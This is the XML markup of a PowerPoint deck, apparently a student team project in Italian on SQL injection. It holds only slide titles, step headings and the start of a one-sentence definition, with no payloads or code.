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Roboto Condensed Bold" charset="1" panose="02000000000000000000"/>
      <p:regular r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arimo" charset="1" panose="020B0604020202020204"/>
      <p:regular r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Condensed" charset="1" panose="02000000000000000000"/>
      <p:regular r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helveticish Bold" charset="1" panose="020B0704020202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it.wikipedia.org/wiki/Attacco_informatico" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId4" Target="https://it.wikipedia.org/wiki/Stringa_(informatica)" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId5" Target="https://it.wikipedia.org/wiki/Codice_sorgente" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId6" Target="https://it.wikipedia.org/wiki/SQL"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jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId4" Target="https://it.wikipedia.org/wiki/Autenticazione" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId5" Target="https://it.wikipedia.org/w/index.php?title=Short-circuit_evaluation&amp;action=edit&amp;redlink=1"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2.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId4" Target="../media/image3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 Id="rId5" Target="../media/image34.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image35.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image3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jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image42.jpe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789255" y="2269255"/>
            <a:ext cx="1366743" cy="1395892"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1395892" w="1366743">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1366743" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1366743" y="1395892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1395892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2780745" y="4871158"/>
            <a:ext cx="12726510" cy="2407343"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="16968680" cy="3209790"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="16968680" cy="1635125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="9600"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="8000">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Bold"/>
                </a:rPr>
                <a:t>PROJECT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 5" id="5"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="2600402"/>
              <a:ext cx="16968680" cy="609388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="3814"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3668021" y="9430188"/>
            <a:ext cx="12726510" cy="473710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3814"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2789255" y="6419791"/>
            <a:ext cx="9111477" cy="1717419"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12148636" cy="2289893"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="12148636" cy="1165225"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="6873"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="5727">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Bold"/>
                </a:rPr>
                <a:t>S6_L5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="1853715"/>
              <a:ext cx="12148636" cy="436178"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="2731"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2789255" y="4119883"/>
            <a:ext cx="5454893" cy="1023617"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7273190" cy="1364823"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-19050"/>
              <a:ext cx="7273190" cy="704850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="4114"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3429">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo"/>
                </a:rPr>
                <a:t>Team 6</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 12" id="12"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="1094102"/>
              <a:ext cx="7273190" cy="270720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="1635"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 13" id="13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="2189548">
            <a:off x="13122251" y="-2424246"/>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14" id="14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-5122256" y="5032716"/>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15" id="15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="2189548">
            <a:off x="-33697" y="10015621"/>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331848" y="6049841"/>
            <a:ext cx="2693232" cy="1087812"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3590976" cy="1450416"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-66675"/>
              <a:ext cx="3590976"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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3590976" cy="5346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Pagina SQL  Injection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1123950" y="6049841"/>
            <a:ext cx="2459408" cy="1506912"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3279211" cy="2009216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 6" id="6"/>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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 7" id="7"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3279211" cy="10934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Descrizione </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3359"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>SQL Injection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="7787080" y="6049841"/>
            <a:ext cx="2459408" cy="2888719"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3279211" cy="3851625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 10" id="10"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="2919339"/>
              <a:ext cx="3279211" cy="469487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="2940"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3279211" cy="16522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Prove di inserimento variabile</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="11266418" y="6049841"/>
            <a:ext cx="2680634" cy="2099883"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3574179" cy="2799843"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 13" id="13"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-66675"/>
              <a:ext cx="3574179"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4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 14" id="14"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="2360539"/>
              <a:ext cx="3574179" cy="469487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="2940"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 15" id="15"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3574179" cy="10934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Verifica della variabile booleana</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 16" id="16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="14704642" y="6049841"/>
            <a:ext cx="2459408" cy="2042973"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3279211" cy="2723965"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 17" id="17"/>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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 18" id="18"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="1801739"/>
              <a:ext cx="3279211" cy="469487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="2940"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 19" id="19"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3279211" cy="5346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Risultati tabella</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="1829822"/>
            <a:ext cx="11515725" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7679"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6399">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t>Procedimento </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="7679"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6399">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 21" id="21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1123950" y="5073102"/>
            <a:ext cx="13834282" cy="253591"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="18445710" cy="338121"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 22" id="22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="1156" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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4" id="24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="4278354" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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6" id="26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="13524447" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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8" id="28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="18108745" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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0" id="30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="8927951" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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name="AutoShape 32" id="32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="true">
            <a:off x="1123977" y="5190372"/>
            <a:ext cx="13580692" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 33" id="33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="-4910486" y="-16031832"/>
            <a:ext cx="27919356" cy="18885934"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="37225808" cy="25181245"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 34" id="34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="-5628874">
              <a:off x="14818332" y="2806147"/>
              <a:ext cx="22164701" cy="21222701"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="21222701" w="22164701">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22164700" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22164700" y="21222701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21222701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect l="0" t="0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 35" id="35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="-5628874">
              <a:off x="242776" y="1152398"/>
              <a:ext cx="22164701" cy="21222701"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="21222701" w="22164701">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22164701" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22164701" y="21222701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21222701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId2"/>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75964" y="299293"/>
            <a:ext cx="6146083" cy="7713562"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8194777" cy="10284749"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="7359120" cy="1279525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="7519"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="6266">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>1.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="6266">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> SQL Injection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="2447587"/>
              <a:ext cx="8194777" cy="724027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Roboto Condensed"/>
                </a:rPr>
                <a:t>Un attacco di tipo </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Bold"/>
                </a:rPr>
                <a:t>SQL injection (SQLi)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="8C52FF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Bold"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Bold"/>
                </a:rPr>
                <a:t>permette ad un utente</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t> non autorizzato di prendere il </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Bold"/>
                </a:rPr>
                <a:t>controllo sui comandi SQL </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
